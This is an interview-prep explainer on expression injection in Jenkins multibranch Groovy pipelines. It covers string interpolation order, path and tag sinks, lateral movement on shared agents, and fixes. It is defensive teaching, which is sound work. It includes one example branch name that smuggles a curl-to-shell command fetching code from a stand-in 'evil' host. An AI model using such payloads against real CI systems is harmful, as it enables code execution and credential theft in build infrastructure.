In a Jenkins multibranch pipeline, why is building a Groovy string from the branch name dangerous?
answer
- which interpreter evaluates first?
- double quotes interpolate before the agent sees it
- a pipeline language is program text too
- directory names and tags are sinks
- shared agents mean lateral movement
basics
~20 sA double-quoted Groovy string is interpolated by the pipeline engine before the command text reaches the agent, so a branch name a contributor chose becomes part of the command. The fix: keep the value out of the program text.
solid answer
~50 sExpression injection is not a property of one CI platform's template syntax; it is what happens whenever untrusted data is concatenated into program text, and a pipeline definition language is program text. In a scripted pipeline, `sh "docker build -t app:${env.BRANCH_NAME} ."` builds the command string in Groovy on the orchestrator first, then ships the finished string to the agent's shell. A branch named `x$(curl -s http://evil/x|sh)` is inside that string. Writing the command in a single-quoted Groovy string, so the agent's shell dereferences `$BRANCH_NAME` from its own environment at run time, restores the same data-versus-code separation an environment-variable handoff gives you elsewhere. Two things make this worse than the usual case: the branch name is chosen by anyone who can open a pull request, and build agents are often long-lived and shared, so execution reaches other jobs' workspaces and cached credentials rather than dying with the run.
go deeper
Learn the tell: a value pasted into a quoted string that later becomes a command is dangerous, whatever language the pipeline is written in. Ask who chose the value before you use it.
Explain the evaluation order — the pipeline language builds the command string first, then the agent's shell parses it — and give the non-interpolating alternative that leaves expansion to the agent.
Show that you can assess blast radius: a contributor-chosen branch name executing on a shared long-lived agent reaches other workspaces, cached toolchains and agent-local credentials, and can persist into unrelated builds.
Take the general position that no pipeline language is exempt, and decide where the organisation spends: safe templates and review for the flaw itself, ephemeral agents to cap the consequence, and neither treated as a substitute for the other.
## The class, not the platform Most material on expression injection is written around one forge's template syntax, which leaves engineers believing it is a YAML problem. It is not. The rule is general: **whenever a layer concatenates data it did not produce into text that another layer will parse as a program, you have expression injection.** A pipeline written in a general-purpose language is just as exposed, and in some ways more so, because string interpolation there feels like ordinary programming rather than a templating feature you were warned about. A multibranch setup creates a build per branch and makes the branch name available to the pipeline. Using it is natural — as a container tag, a workspace directory, a deployment namespace, a label. The dangerous version is the one where the name is interpolated into a string that becomes a command. ## Order of evaluation, again In a Groovy pipeline there are two interpolations that look identical and behave completely differently: - **Double-quoted:** `sh "echo ${env.BRANCH_NAME}"` — Groovy builds the string on the orchestrator, substituting the branch name, and the finished text is sent to the agent. The branch name is command text. - **Single-quoted:** `sh 'echo $BRANCH_NAME'` — Groovy performs no interpolation; the literal text `echo $BRANCH_NAME` reaches the agent, and the agent's shell expands the variable from its own environment after parsing. The branch name is data. This is the same parse-then-expand distinction as an environment-variable handoff in a YAML pipeline, wearing different clothes. The lesson worth carrying is that you must always be able to say *which interpreter evaluates this, and in what order* — the platform decides the syntax, not the principle. ## Sinks that are not a shell The branch name in this scenario also names a workspace directory and a container tag, and it is worth separating those risks because they persist even after the shell command is fixed: - **As a path component**, a value containing traversal segments can point the build at a directory it should not touch — another job's workspace on the same agent, a shared cache, a tool installation. Whether the platform normalises this varies, which is precisely why you should not depend on it. - **As a container tag or label**, the value is later read by other tooling that may parse it, and it can collide with or overwrite a tag another process expects to be authoritative. - **As an argument**, a value beginning with a dash may be read as an option by whatever program receives it. None of these are code execution on their own. They matter because they let a contributor influence state outside their own build. ## Blast radius on a shared agent Who the attacker is: anyone who can open a pull request chooses its branch name. That is a very low bar, and on many teams it includes people whose access was scoped deliberately narrowly — contractors, interns, external collaborators. What they reach matters more here than in an ephemeral-runner world. Long-lived build agents accumulate things: other jobs' workspaces, cached dependencies and toolchains, credential material left in agent-local configuration, network reachability into environments a developer laptop cannot see. Code execution on such an agent is lateral movement inside the build estate, and it persists into later builds — a poisoned cached dependency or a tampered local tool affects jobs that have nothing to do with the attacker's branch. Ephemeral, single-use agents shrink this substantially, and they are worth having, but they bound the consequence rather than removing the flaw: the injected code still runs with everything that one job was given. ## Fixing it, and finding it The fix is structural and cheap: pass untrusted values to commands through the agent's environment and reference them with a literal, non-interpolated string; build argument lists rather than command lines where the pipeline language supports it; validate the value's shape when it is genuinely constrained (a namespace, a tag) instead of trusting the forge's naming rules. Finding the existing cases is harder than it looks. A search for interpolation of known-untrusted variables inside command strings catches the direct occurrences, but it misses the value that was assigned into a local variable three lines earlier, and it misses the secondary sinks where the value is pasted into a generated file or a structured document. Treat the search as triage and the review as the actual control, and make the safe pattern the one that appears in whatever template teams copy from. ## In an interview The point to land is that you recognise the class independently of the platform. Say which interpreter runs first, name the non-shell sinks, and be explicit that a shared long-lived agent turns one contributor's branch name into a foothold in the build estate rather than a single compromised run.
- The branch name is only used to name a workspace directory and a container tag — no shell command. Is it still a risk?Yes, with a different sink. As a path component it can carry traversal segments toward another job's workspace or a shared cache; as a tag it can collide with one another process treats as authoritative; and as an argument it can be read as an option if it starts with a dash. None is code execution, but each lets a contributor affect state outside their own build.
- Why does this matter more on a long-lived shared agent than on an ephemeral runner?Persistence and reach. A shared agent holds other jobs' workspaces, cached dependencies and toolchains, and agent-local credential material, so execution there is lateral movement and can poison later builds that have nothing to do with the attacker. Ephemeral agents bound the damage to one run, which is worth having — but the injected code still runs with that run's secrets and write access.
- Can you rely on the platform sanitizing the branch name before it becomes a directory name?No. Some platforms do normalise or truncate names used as paths, and the behaviour differs by version and by which variable you read. Depending on it means your safety is a side effect of someone else's implementation detail. Validate the value against the shape you actually need, or derive the directory from something you control such as a build number.
saying these in an interview costs you the question
- Thinks only YAML-based pipelines have expression injection
- Says quoting inside the shell command protects the value
- Assumes only maintainers can create branch names
- Believes a directory or tag name cannot be an injection sink
- Claims an ephemeral agent removes the vulnerability